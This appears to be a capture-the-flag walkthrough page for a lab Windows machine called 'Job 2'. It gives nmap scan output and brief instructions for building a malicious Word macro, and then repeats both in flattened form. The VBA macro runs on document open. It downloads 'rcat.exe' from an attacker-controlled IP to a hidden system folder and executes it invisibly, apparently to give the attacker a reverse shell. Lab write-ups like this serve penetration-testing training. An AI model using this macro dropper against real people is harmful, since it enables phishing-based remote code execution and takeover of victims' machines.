Job 2

PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 a3:94:77:ca:16:0e:ec:fb:23:86:67:c6:0a:e3:ca:7b (RSA)
|   256 0e:2a:31:70:94:99:5d:95:d4:f8:40:d5:b5:36:8e:88 (ECDSA)
|_  256 29:31:2a:c3:55:b2:f7:73:f2:d3:bd:bc:c5:c1:14:f0 (ED25519)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Not valid before: 2023-05-09T13:31:40
|_Not valid after:  2122-05-09T13:41:37
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
|_ssl-date: 2024-04-06T10:06:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=JOB2
| Not valid before: 2024-04-05T09:19:48
|_Not valid after:  2024-10-05T09:19:48
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Enable Developer Tools in the Ribbon Menu to gain access to macros
Name your Macro AutoOpen() if you are working with Word 2016+
Select the Current Document as the place to store the Macro
Don't use .docx as the file extension since it won't allow for embedded macros. Either use .doc or .docm
When using the 64 bit version of Microsoft Word, Declare VBA functions with "PtrSafe" to avoid compilation errors.

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _
    ByVal pCaller As Long, _
    ByVal szURL As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Private Declare PtrSafe Function WinExec Lib "kernel32" ( _
    ByVal lpCmdLine As String, _
    ByVal uCmdShow As Long) As Long

Sub AutoOpen()
    URLDownloadToFileA 0, "http://10.8.0.123/rcat.exe", "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", 0, 0
    WinExec "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", SHOW_HIDE
End Sub

PreviousHybrid NextLock

Last updated 8 months ago

Was this helpful?

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0) | ssh-hostkey: | 3072 a3:94:77:ca:16:0e:ec:fb:23:86:67:c6:0a:e3:ca:7b (RSA) | 256 0e:2a:31:70:94:99:5d:95:d4:f8:40:d5:b5:36:8e:88 (ECDSA) |_ 256 29:31:2a:c3:55:b2:f7:73:f2:d3:bd:bc:c5:c1:14:f0 (ED25519) 25/tcp open smtp hMailServer smtpd | smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 111/tcp open rpcbind 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=www.job2.vl | Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl | Not valid before: 2023-05-09T13:31:40 |_Not valid after: 2122-05-09T13:41:37 | tls-alpn: |_ http/1.1 |_http-server-header: Microsoft-HTTPAPI/2.0 445/tcp open microsoft-ds? 1063/tcp open rpcbind 2049/tcp open rpcbind 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-04-06T10:06:54+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=JOB2 | Not valid before: 2024-04-05T09:19:48 |_Not valid after: 2024-10-05T09:19:48 10001/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier 10002/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier 10003/tcp open storagecraft-image StorageCraft Image Manager Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" ( _ ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Private Declare PtrSafe Function WinExec Lib "kernel32" ( _ ByVal lpCmdLine As String, _ ByVal uCmdShow As Long) As Long Sub AutoOpen() URLDownloadToFileA 0, "http://10.8.0.123/rcat.exe", "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", 0, 0 WinExec "C:\Windows\system32\spool\drivers\color\rcat_10.8.0.123_443.exe", SHOW_HIDE End Sub